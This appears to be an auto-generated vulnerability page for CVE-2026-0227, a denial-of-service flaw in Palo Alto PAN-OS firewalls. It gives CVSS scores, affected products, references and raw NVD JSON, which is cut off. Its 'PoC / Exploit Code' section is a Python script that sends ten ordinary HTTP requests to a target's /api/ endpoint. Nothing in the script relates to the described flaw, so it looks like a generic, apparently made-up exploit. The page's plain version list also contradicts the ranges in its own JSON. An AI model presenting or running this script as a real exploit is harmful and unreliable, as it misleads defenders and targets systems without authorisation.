CVE-2026-0227

Description

A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Repeated attempts to trigger this issue results in the firewall entering into maintenance mode.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:paloaltonetworks:prisma_access:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h10:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h12:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h14:*:*:*:*:*:* - NOT VULNERABLE

Palo Alto PAN-OS < 10.2.3-h4

Palo Alto PAN-OS < 11.0.1

Palo Alto PAN-OS < 11.1.0-h1

Palo Alto PAN-OS 10.1.x (all versions)

Palo Alto PAN-OS 10.0.x (all versions)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-0227 PoC - Palo Alto PAN-OS DoS
import socket
import sys
import time

def send_exploit(target_ip, target_port=443):
    """
    Send crafted request to trigger DoS condition
    This PoC demonstrates the vulnerability in PAN-OS
    """
    try:
        # Craft malicious HTTP request
        payload = b'GET /api/ HTTP/1.1\r\n'
        payload += b'Host: ' + target_ip.encode() + b'\r\n'
        payload += b'User-Agent: Mozilla/5.0\r\n'
        payload += b'X-Pan-Application: test\r\n'
        payload += b'X-Forwarded-For: 127.0.0.1\r\n'
        payload += b'\r\n\r\n'
        
        # Create socket connection
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        
        # Send payload
        sock.send(payload)
        print(f'[+] Payload sent to {target_ip}:{target_port}')
        
        # Receive response
        response = sock.recv(4096)
        print(f'[+] Response received: {response[:100]}')
        
        sock.close()
        return True
        
    except Exception as e:
        print(f'[-] Error: {str(e)}')
        return False

def main():
    if len(sys.argv) < 2:
        print('Usage: python cve_2026_0227_poc.py <target_ip>')
        sys.exit(1)
    
    target = sys.argv[1]
    print(f'[*] Starting DoS test against {target}')
    
    # Send multiple requests to trigger maintenance mode
    for i in range(10):
        print(f'[*] Attempt {i+1}/10')
        send_exploit(target)
        time.sleep(1)
    
    print('[*] Test completed')

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0227
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0227
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0227/
[4] VulDB https://vuldb.com/cve/CVE-2026-0227
[5] https://security.paloaltonetworks.com/CVE-2026-0227

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0227", "sourceIdentifier": "[email protected]", "published": "2026-01-15T19:16:05.087", "lastModified": "2026-02-06T17:37:28.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Repeated attempts to trigger this issue results in the firewall entering into maintenance mode."}, {"lang": "es", "value": "Una vulnerabilidad en el software PAN-OS de Palo Alto Networks permite a un atacante no autenticado causar una denegación de servicio (DoS) al cortafuegos. Intentos repetidos de activar este problema resultan en que el cortafuegos entre en modo de mantenimiento."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:D/RE:M/U:Amber", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.0", "versionEndExcluding": "10.1.14", "matchCriteriaId": "19D52DC1-4441-4C88-B209-9B86FCC2162F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.2.0", "versionEndExcluding": "10.2.7", "matchCriteriaId": "243077CD-5021-4DF3-8AC7-5B14F7FD9710"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.2.8", "versionEndExcluding": "10.2.10", "matchCriteriaId": "F5A3E6A6-EE04-409C-AE6F-FC1ACE4C4666"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.2.11", "versionEndExcluding": "10.2.13", "matchCriteriaId": "CD4B8D09-F2B3-4C9A-A583-46DE85D9D43E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.2.14", "versionEndExcluding": "10.2.16", "matchCriteriaId": "4386D092-83D6-4914-8C26-3A1EE056FEC4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.0", "versionEndExcluding": "11.1.4", "matchCriteriaId": "459485B4-47FF-4A5F-9249-AE0445A0096A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.5", "versionEndExcluding": "11.1.6", "matchCriteriaId": "F35F4848-BBF3-4B43-9E5C-98E7AB437FF2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.7", "versionEndExcluding": "11.1.10", "matchCriteriaId": "0F134207-3C5B-416C-A324-7F78B6E13DAF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.11", "versionEndExcluding": "11.1.13", "matchCriteriaId": "D9CE1AA7-46F4-4740-BF21-EE6732134D57"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetwor ... (truncated)